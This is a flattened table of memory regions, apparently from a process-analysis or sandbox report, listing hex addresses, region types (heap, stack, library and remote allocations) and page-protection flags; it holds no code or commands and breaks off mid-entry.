|
4E6000
|
heap
|
page read and write
|
||
|
42E0000
|
heap
|
page read and write
|
||
|
5800000
|
heap
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
34FD000
|
heap
|
page read and write
|
||
|
34BA000
|
heap
|
page read and write
|
||
|
1A99C000
|
stack
|
page read and write
|
||
|
492000
|
heap
|
page read and write
|
||
|
2BF1000
|
trusted library allocation
|
page read and write
|
||
|
34B3000
|
heap
|
page read and write
|
||
|
2E14000
|
trusted library allocation
|
page read and write
|
||
|
1B016000
|
heap
|
page read and write
|
||
|
710000
|
trusted library allocation
|
page read and write
|
||
|
394F000
|
stack
|
page read and write
|
||
|
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
|
3D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C6EE000
|
stack
|
page read and write
|
||
|
22F0000
|
heap
|
page execute and read and write
|
||
|
609000
|
heap
|
page read and write
|
||
|
134000
|
trusted library allocation
|
page read and write
|
||
|
37A0000
|
trusted library allocation
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
354000
|
heap
|
page read and write
|
||
|
2465000
|
trusted library allocation
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
3F0000
|
trusted library allocation
|
page read and write
|
||
|
34B8000
|
heap
|
page read and write
|
||
|
3497000
|
heap
|
page read and write
|
||
|
34FD000
|
heap
|
page read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89986000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page read and write
|
||
|
230E000
|
stack
|
page read and write | page guard
|
||
|
20000
|
heap
|
page read and write
|
||
|
4E2000
|
heap
|
page read and write
|
||
|
120000
|
trusted library allocation
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
1D20000
|
direct allocation
|
page read and write
|
||
|
439F000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
4E2000
|
heap
|
page read and write
|
||
|
1A870000
|
heap
|
page execute and read and write
|
||
|
7FE89C90000
|
trusted library allocation
|
page read and write
|
||
|
7FE898DB000
|
trusted library allocation
|
page read and write
|
||
|
1D07000
|
direct allocation
|
page read and write
|
||
|
1BF4000
|
heap
|
page read and write
|
||
|
34B8000
|
heap
|
page read and write
|
||
|
39A0000
|
heap
|
page read and write
|
||
|
1C333000
|
heap
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
1DCB000
|
heap
|
page read and write
|
||
|
1C3F6000
|
heap
|
page read and write
|
||
|
34B5000
|
heap
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
495000
|
heap
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
12D000
|
heap
|
page read and write
|
||
|
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
|
3FB0000
|
heap
|
page read and write
|
||
|
3C3000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
23BE000
|
trusted library allocation
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
7FE898C2000
|
trusted library allocation
|
page read and write
|
||
|
43B3000
|
heap
|
page read and write
|
||
|
40E000
|
heap
|
page read and write
|
||
|
49C000
|
heap
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8991C000
|
trusted library allocation
|
page execute and read and write
|
||
|
379E000
|
stack
|
page read and write
|
||
|
7FE89A5C000
|
trusted library allocation
|
page read and write
|
||
|
34C1000
|
heap
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
484000
|
heap
|
page read and write
|
||
|
34AF000
|
heap
|
page read and write
|
||
|
493000
|
heap
|
page read and write
|
||
|
1F8000
|
heap
|
page read and write
|
||
|
4E4000
|
heap
|
page read and write
|
||
|
1C560000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
1BF95000
|
heap
|
page read and write
|
||
|
202000
|
heap
|
page read and write
|
||
|
34B1000
|
heap
|
page read and write
|
||
|
1AD52000
|
heap
|
page read and write
|
||
|
5A8E000
|
stack
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
4360000
|
heap
|
page read and write
|
||
|
34AF000
|
heap
|
page read and write
|
||
|
335000
|
heap
|
page read and write
|
||
|
3424000
|
heap
|
page read and write
|
||
|
43B7000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
1F80000
|
direct allocation
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
341C000
|
heap
|
page read and write
|
||
|
34AF000
|
heap
|
page read and write
|
||
|
7FE89A77000
|
trusted library allocation
|
page read and write
|
||
|
1A7C0000
|
heap
|
page execute and read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
1AFDF000
|
stack
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
1B2EF000
|
stack
|
page read and write
|
||
|
CDE000
|
stack
|
page read and write
|
||
|
3900000
|
heap
|
page read and write
|
||
|
491000
|
heap
|
page read and write
|
||
|
22E000
|
heap
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
16D000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
1C3CF000
|
stack
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
1C3E2000
|
heap
|
page read and write
|
||
|
479E000
|
stack
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
31F000
|
heap
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
4CB0000
|
heap
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
4AF0000
|
trusted library allocation
|
page read and write
|
||
|
25A4000
|
heap
|
page read and write
|
||
|
34BA000
|
heap
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
4FE000
|
heap
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
7FE89C36000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
1FD3000
|
direct allocation
|
page read and write
|
||
|
3CB4000
|
heap
|
page read and write
|
||
|
1C19F000
|
stack
|
page read and write
|
||
|
350B000
|
heap
|
page read and write
|
||
|
3431000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
heap
|
page read and write
|
||
|
2D28000
|
trusted library allocation
|
page read and write
|
||
|
2BF7000
|
trusted library allocation
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
2F5A000
|
stack
|
page read and write
|
||
|
1C3B7000
|
heap
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
3290000
|
trusted library allocation
|
page execute
|
||
|
1A5FB000
|
heap
|
page read and write
|
||
|
4E9F000
|
stack
|
page read and write
|
||
|
3E9D000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
4AF0000
|
trusted library allocation
|
page read and write
|
||
|
34B4000
|
heap
|
page read and write
|
||
|
1FC7000
|
direct allocation
|
page read and write
|
||
|
1A948000
|
stack
|
page read and write
|
||
|
43A5000
|
heap
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
468000
|
heap
|
page read and write
|
||
|
7FE898A4000
|
trusted library allocation
|
page read and write
|
||
|
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
|
31C000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89956000
|
trusted library allocation
|
page read and write
|
||
|
1ACBA000
|
stack
|
page read and write
|
||
|
4393000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
25A0000
|
heap
|
page read and write
|
||
|
4AB000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
4CF0000
|
heap
|
page read and write
|
||
|
34C1000
|
heap
|
page read and write
|
||
|
3507000
|
heap
|
page read and write
|
||
|
499000
|
heap
|
page read and write
|
||
|
140000
|
trusted library allocation
|
page read and write
|
||
|
1F00000
|
direct allocation
|
page read and write
|
||
|
1A7FE000
|
heap
|
page execute and read and write
|
||
|
1B0D5000
|
heap
|
page read and write
|
||
|
1D1F000
|
direct allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
31A000
|
heap
|
page read and write
|
||
|
1B0D0000
|
heap
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
24A0000
|
heap
|
page read and write
|
||
|
34B5000
|
heap
|
page read and write
|
||
|
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
|
331000
|
heap
|
page read and write
|
||
|
342A000
|
heap
|
page read and write
|
||
|
3424000
|
heap
|
page read and write
|
||
|
3E94000
|
heap
|
page read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
2925000
|
heap
|
page read and write
|
||
|
463000
|
heap
|
page read and write
|
||
|
12488000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
trusted library allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
1BE0000
|
trusted library allocation
|
page read and write
|
||
|
1F50000
|
heap
|
page read and write
|
||
|
7FE89A73000
|
trusted library allocation
|
page read and write
|
||
|
34B1000
|
heap
|
page read and write
|
||
|
3507000
|
heap
|
page read and write
|
||
|
23E000
|
heap
|
page read and write
|
||
|
5DC0000
|
heap
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
555E000
|
stack
|
page read and write
|
||
|
50CD000
|
heap
|
page read and write
|
||
|
3509000
|
heap
|
page read and write
|
||
|
4F2000
|
heap
|
page read and write
|
||
|
3EA6000
|
heap
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
2080000
|
heap
|
page execute and read and write
|
||
|
55AE000
|
stack
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
3B20000
|
heap
|
page read and write
|
||
|
1A4000
|
heap
|
page read and write
|
||
|
4395000
|
heap
|
page read and write
|
||
|
48CF000
|
stack
|
page read and write
|
||
|
1C91B000
|
stack
|
page read and write
|
||
|
B72000
|
heap
|
page read and write
|
||
|
1A60C000
|
heap
|
page read and write
|
||
|
1B0AF000
|
stack
|
page read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
5BDE000
|
stack
|
page read and write
|
||
|
3437000
|
heap
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C3EA000
|
heap
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
24FE000
|
trusted library allocation
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
34B1000
|
heap
|
page read and write
|
||
|
1C12F000
|
stack
|
page read and write
|
||
|
343C000
|
heap
|
page read and write
|
||
|
489000
|
heap
|
page read and write
|
||
|
1F54000
|
heap
|
page read and write
|
||
|
295B000
|
heap
|
page read and write
|
||
|
34EA000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
2D3F000
|
trusted library allocation
|
page read and write
|
||
|
7FE898A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
459000
|
heap
|
page read and write
|
||
|
48D000
|
heap
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
670000
|
heap
|
page execute and read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
7FE898C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
150000
|
remote allocation
|
page read and write
|
||
|
5FF0000
|
heap
|
page read and write
|
||
|
319000
|
heap
|
page read and write
|
||
|
341C000
|
heap
|
page read and write
|
||
|
7FE89AA8000
|
trusted library allocation
|
page read and write
|
||
|
4397000
|
heap
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
1AE000
|
heap
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
1C389000
|
heap
|
page read and write
|
||
|
7FE89C3D000
|
trusted library allocation
|
page read and write
|
||
|
7FE8997C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE899E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
43C8000
|
heap
|
page read and write
|
||
|
1A68F000
|
stack
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
230F000
|
stack
|
page read and write
|
||
|
1AD87000
|
heap
|
page read and write
|
||
|
3642000
|
trusted library allocation
|
page read and write
|
||
|
1B1CB000
|
stack
|
page read and write
|
||
|
31E000
|
heap
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
34A7000
|
heap
|
page read and write
|
||
|
342B000
|
heap
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
15A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CA3A000
|
stack
|
page read and write
|
||
|
A0000
|
heap
|
page read and write
|
||
|
7B7000
|
heap
|
page read and write
|
||
|
3432000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
170000
|
trusted library allocation
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
342A000
|
heap
|
page read and write
|
||
|
343F000
|
heap
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
3A2000
|
heap
|
page read and write
|
||
|
7FE89C58000
|
trusted library allocation
|
page read and write
|
||
|
34EF000
|
heap
|
page read and write
|
||
|
43A5000
|
heap
|
page read and write
|
||
|
2BF9000
|
trusted library allocation
|
page read and write
|
||
|
4DB000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
34B2000
|
heap
|
page read and write
|
||
|
43A2000
|
heap
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
1A310000
|
heap
|
page read and write
|
||
|
144000
|
heap
|
page read and write
|
||
|
1FA0000
|
direct allocation
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
350E000
|
heap
|
page read and write
|
||
|
319000
|
heap
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
1A59A000
|
stack
|
page read and write
|
||
|
50D1000
|
heap
|
page read and write
|
||
|
4EF000
|
heap
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
489000
|
heap
|
page read and write
|
||
|
1C402000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
1ACFF000
|
heap
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
1A626000
|
heap
|
page read and write
|
||
|
3509000
|
heap
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
49C000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
37A000
|
heap
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
2BFD000
|
trusted library allocation
|
page read and write
|
||
|
1A7B4000
|
heap
|
page read and write
|
||
|
4FE000
|
heap
|
page read and write
|
||
|
2431000
|
trusted library allocation
|
page read and write
|
||
|
4361000
|
heap
|
page read and write
|
||
|
3448000
|
heap
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
3E00000
|
heap
|
page read and write
|
||
|
140000
|
heap
|
page read and write
|
||
|
1C0000
|
trusted library allocation
|
page read and write
|
||
|
34AF000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
4E3000
|
heap
|
page read and write
|
||
|
409000
|
heap
|
page read and write
|
||
|
391000
|
heap
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
47B3000
|
heap
|
page read and write
|
||
|
7FE89CE0000
|
trusted library allocation
|
page read and write
|
||
|
34C1000
|
heap
|
page read and write
|
||
|
3507000
|
heap
|
page read and write
|
||
|
1EE0000
|
direct allocation
|
page read and write
|
||
|
3074000
|
trusted library allocation
|
page read and write
|
||
|
34B5000
|
heap
|
page read and write
|
||
|
34C8000
|
heap
|
page read and write
|
||
|
7FE898CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
|
2714000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
236F000
|
trusted library allocation
|
page read and write
|
||
|
15C000
|
stack
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
1AB1B000
|
stack
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
3459000
|
trusted library allocation
|
page read and write
|
||
|
1C280000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
466000
|
heap
|
page read and write
|
||
|
34B3000
|
heap
|
page read and write
|
||
|
7FE898E0000
|
trusted library allocation
|
page read and write
|
||
|
1D66000
|
heap
|
page read and write
|
||
|
7FE89C3A000
|
trusted library allocation
|
page read and write
|
||
|
1B120000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
2E0E000
|
trusted library allocation
|
page read and write
|
||
|
508E000
|
stack
|
page read and write
|
||
|
1C36000
|
heap
|
page read and write
|
||
|
323000
|
heap
|
page read and write
|
||
|
3670000
|
trusted library allocation
|
page read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
4DB000
|
heap
|
page read and write
|
||
|
34B3000
|
heap
|
page read and write
|
||
|
1C3D3000
|
heap
|
page read and write
|
||
|
3451000
|
heap
|
page read and write
|
||
|
3EAF000
|
heap
|
page read and write
|
||
|
288000
|
stack
|
page read and write
|
||
|
1DC0000
|
heap
|
page read and write
|
||
|
463000
|
heap
|
page read and write
|
||
|
3C7E000
|
stack
|
page read and write
|
||
|
90000
|
heap
|
page read and write
|
||
|
4F2000
|
heap
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
|
593E000
|
stack
|
page read and write
|
||
|
4E2000
|
heap
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page execute and read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
49C000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
343C000
|
heap
|
page read and write
|
||
|
1F60000
|
direct allocation
|
page read and write
|
||
|
1B3CE000
|
stack
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
362B000
|
trusted library allocation
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
1C3FD000
|
heap
|
page read and write
|
||
|
4F2000
|
heap
|
page read and write
|
||
|
3509000
|
heap
|
page read and write
|
||
|
2D35000
|
trusted library allocation
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
350D000
|
heap
|
page read and write
|
||
|
156000
|
trusted library allocation
|
page execute and read and write
|
||
|
4030000
|
trusted library allocation
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
2E16000
|
trusted library allocation
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
1A7B0000
|
heap
|
page read and write
|
||
|
1BF90000
|
heap
|
page read and write
|
||
|
34A7000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
4D8E000
|
stack
|
page read and write
|
||
|
1C7EC000
|
stack
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
510000
|
trusted library allocation
|
page read and write
|
||
|
275000
|
heap
|
page read and write
|
||
|
34C1000
|
heap
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
1C28A000
|
heap
|
page read and write
|
||
|
3B1000
|
heap
|
page read and write
|
||
|
1B10B000
|
heap
|
page read and write
|
||
|
1AD06000
|
heap
|
page read and write
|
||
|
46F000
|
heap
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
21CF000
|
stack
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
F3E000
|
stack
|
page read and write
|
||
|
7FE89970000
|
trusted library allocation
|
page read and write
|
||
|
34BC000
|
heap
|
page read and write
|
||
|
350E000
|
heap
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
4DB000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
24FC000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
4DB000
|
heap
|
page read and write
|
||
|
7FE89A40000
|
trusted library allocation
|
page read and write
|
||
|
3EA6000
|
heap
|
page read and write
|
||
|
40D000
|
heap
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
1C30D000
|
heap
|
page read and write
|
||
|
1FC7000
|
direct allocation
|
page read and write
|
||
|
7FE898AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
7FE899A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
287000
|
heap
|
page read and write
|
||
|
2BFB000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
540000
|
trusted library allocation
|
page read and write
|
||
|
1CB10000
|
heap
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
1A8C9000
|
stack
|
page read and write
|
||
|
4FE000
|
heap
|
page read and write
|
||
|
1A4AC000
|
stack
|
page read and write
|
||
|
150000
|
remote allocation
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
3427000
|
heap
|
page read and write
|
||
|
3E80000
|
heap
|
page read and write
|
||
|
3E89000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
1C7000
|
heap
|
page read and write
|
||
|
34CB000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
1C0BD000
|
stack
|
page read and write
|
||
|
2713000
|
trusted library allocation
|
page read and write
|
||
|
1A7BA000
|
stack
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
353000
|
heap
|
page read and write
|
||
|
34F4000
|
heap
|
page read and write
|
||
|
24D6000
|
heap
|
page read and write
|
||
|
460000
|
direct allocation
|
page read and write
|
||
|
12341000
|
trusted library allocation
|
page read and write
|
||
|
5090000
|
heap
|
page read and write
|
||
|
2F92000
|
trusted library allocation
|
page read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
342D000
|
heap
|
page read and write
|
||
|
3507000
|
heap
|
page read and write
|
||
|
1C416000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
38F000
|
heap
|
page read and write
|
||
|
1A689000
|
heap
|
page read and write
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
48C000
|
heap
|
page read and write
|
||
|
2D5000
|
stack
|
page read and write
|
||
|
7FE8995C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B00E000
|
stack
|
page read and write
|
||
|
4DB000
|
heap
|
page read and write
|
||
|
343C000
|
heap
|
page read and write
|
||
|
1C2DA000
|
heap
|
page read and write
|
||
|
34BC000
|
heap
|
page read and write
|
||
|
1B1D0000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
2D25000
|
trusted library allocation
|
page read and write
|
||
|
1EFF000
|
stack
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
1C335000
|
heap
|
page read and write
|
||
|
1B90000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
40E000
|
heap
|
page read and write
|
||
|
350B000
|
heap
|
page read and write
|
||
|
439E000
|
heap
|
page read and write
|
||
|
4DB000
|
heap
|
page read and write
|
||
|
1B2EE000
|
stack
|
page read and write | page guard
|
||
|
5D20000
|
heap
|
page read and write
|
||
|
7FE89C24000
|
trusted library allocation
|
page read and write
|
||
|
1F20000
|
direct allocation
|
page read and write
|
||
|
D0000
|
heap
|
page read and write
|
||
|
4DB000
|
heap
|
page read and write
|
||
|
455D000
|
stack
|
page read and write
|
||
|
4F2000
|
heap
|
page read and write
|
||
|
2C02000
|
trusted library allocation
|
page read and write
|
||
|
317000
|
heap
|
page read and write
|
||
|
5DD1000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
476D000
|
stack
|
page read and write
|
||
|
1D03000
|
direct allocation
|
page read and write
|
||
|
34B7000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
4E8000
|
heap
|
page read and write
|
||
|
3AE000
|
heap
|
page read and write
|
||
|
4CB5000
|
heap
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
37C2000
|
trusted library allocation
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
7FE898B3000
|
trusted library allocation
|
page read and write
|
||
|
7AE000
|
stack
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
498000
|
heap
|
page read and write
|
||
|
4F2000
|
heap
|
page read and write
|
||
|
43B3000
|
heap
|
page read and write
|
||
|
3424000
|
heap
|
page read and write
|
||
|
1AD04000
|
heap
|
page read and write
|
||
|
34C2000
|
heap
|
page read and write
|
||
|
34F000
|
heap
|
page read and write
|
||
|
34C2000
|
heap
|
page read and write
|
||
|
342B000
|
heap
|
page read and write
|
||
|
1A370000
|
heap
|
page read and write
|
||
|
7FE89A42000
|
trusted library allocation
|
page read and write
|
||
|
2513000
|
trusted library allocation
|
page read and write
|
||
|
37D0000
|
heap
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
24CC000
|
trusted library allocation
|
page read and write
|
||
|
12311000
|
trusted library allocation
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
34B5000
|
heap
|
page read and write
|
||
|
B54000
|
heap
|
page read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
7FE898D0000
|
trusted library allocation
|
page read and write
|
||
|
1A73F000
|
stack
|
page read and write
|
||
|
462000
|
heap
|
page read and write
|
||
|
1C10E000
|
stack
|
page read and write
|
||
|
1DF6000
|
heap
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
21B0000
|
heap
|
page read and write
|
||
|
343C000
|
heap
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
39F000
|
heap
|
page read and write
|
||
|
2570000
|
trusted library allocation
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
34BC000
|
heap
|
page read and write
|
||
|
3AF000
|
heap
|
page read and write
|
||
|
7FE89976000
|
trusted library allocation
|
page read and write
|
||
|
2710000
|
heap
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
34A7000
|
heap
|
page read and write
|
||
|
2BF5000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C29000
|
trusted library allocation
|
page read and write
|
||
|
3CA0000
|
heap
|
page read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
35A000
|
heap
|
page read and write
|
||
|
52BD000
|
stack
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
14D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3E0000
|
trusted library allocation
|
page read and write
|
||
|
1AD76000
|
heap
|
page read and write
|
||
|
467F000
|
stack
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
34FD000
|
heap
|
page read and write
|
||
|
7FE89AA2000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
34B5000
|
heap
|
page read and write
|
||
|
1C00000
